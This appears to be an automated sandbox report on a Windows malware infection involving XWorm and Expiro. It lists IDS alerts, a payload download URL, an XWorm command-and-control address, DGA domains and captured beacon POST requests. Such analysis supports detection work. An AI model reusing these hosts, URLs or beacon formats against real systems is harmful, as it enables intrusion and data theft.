                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: alg.exe, 00000010.00000003.2983037268.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2248747931.000000001E750000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: maintenanceservice.pdb` source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: WmiApSrv.pdb source: wdmvmswJ.pif, 0000000C.00000003.1890573767.0000000024860000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: alg.exe, 00000010.00000003.2984642643.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: alg.exe, 00000010.00000003.2987067217.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: locator.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1760528912.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1777312759.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: alg.exe, 00000010.00000003.2981785083.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: alg.exe, 00000010.00000003.2980968904.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: AppVShNotify.pdb source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: wdmvmswJ.pif, 0000000C.00000003.2173595593.000000001E710000.00000004.00001000.00020000.00000000.sdmp

                Spreading

                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02AF5908
                Source: C:\Users\Public\alpha.pif Code function: 13_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,13_2_00020207
                Source: C:\Users\Public\alpha.pif Code function: 13_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,13_2_0002589A
                Source: C:\Users\Public\alpha.pif Code function: 13_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,13_2_00033E66
                Source: C:\Users\Public\alpha.pif Code function: 13_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_00024EC1
                Source: C:\Users\Public\alpha.pif Code function: 13_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,13_2_0001532E
                Source: C:\Users\Public\alpha.pif Code function: 17_2_0002589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,17_2_0002589A
                Source: C:\Users\Public\alpha.pif Code function: 17_2_00020207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,17_2_00020207
                Source: C:\Users\Public\alpha.pif Code function: 17_2_00033E66 FindFirstFileW,FindNextFileW,FindClose,17_2_00033E66
                Source: C:\Users\Public\alpha.pif Code function: 17_2_00024EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00024EC1
                Source: C:\Users\Public\alpha.pif Code function: 17_2_0001532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,17_2_0001532E
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                Source: C:\Users\Public\Libraries\wdmvmswJ.pif File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

                Networking

                Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49708 -> 54.244.188.177:80
                Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:65093 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:51366 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:61527 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60770 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 62.60.190.120:7923 -> 192.168.2.8:49727
                Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 62.60.190.120:7923 -> 192.168.2.8:49727
                Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
                Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49800 -> 18.246.231.120:80
                Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49727 -> 62.60.190.120:7923
                Source: Network traffic Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:50711 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:58390 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.8:57993 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:61989 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:50171 -> 18.141.10.107:80
                Source: Network traffic Suricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.8:55730 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.8:62117 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:50355 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:60253 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57471 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:60791 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.8:49846 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:56268 -> 82.112.184.197:80
                Source: Network traffic Suricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.8:57634 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49727 -> 62.60.190.120:7923
                Source: Network traffic Suricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.8:60684 -> 1.1.1.1:53
                Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.8:53706 -> 1.1.1.1:53
                Source: Malware configuration extractor URLs: 62.60.190.120
                Source: Malware configuration extractor URLs: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya
                Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
                Source: unknown Network traffic detected: DNS query count 129
                Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B0E4B8 InternetCheckConnectionA,4_2_02B0E4B8
                Source: global traffic TCP traffic: 192.168.2.8:49727 -> 62.60.190.120:7923
                Source: global traffic DNS traffic detected: number of DNS queries: 129
                Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 188.114.97.3:443
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.8:49711
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49708
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49708
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.8:49731
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.8:49731
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.8:49711
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.8:49790
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.8:49790
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.8:49749
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.8:49752
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.8:49771
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.8:49771
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.8:49802
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.8:49802
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.8:49779
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.8:49779
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.8:49745
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.8:49745
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.8:49785
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.8:49785
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.8:49752
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.8:49749
                Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.8:49753
                Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.8:49753
                Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49716
                Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49776
                Source: global traffic HTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: chichometextiles.com
                Source: global trafficHTTP traffic detected: POST /fkcgbfiiatbbgsse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lfobofpdm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wstlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /sn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /ohrgkx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ovauxeggsejjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vekxop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gblgywtx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bjgrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /tpndpotka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dona HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qylgmshijgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nur HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /wveyxjtgsxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /klflkg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cisadtlsyrfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xymnprgj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cjqgdtkxtfqqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hmiutucdfnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /yhjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ulgmbpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
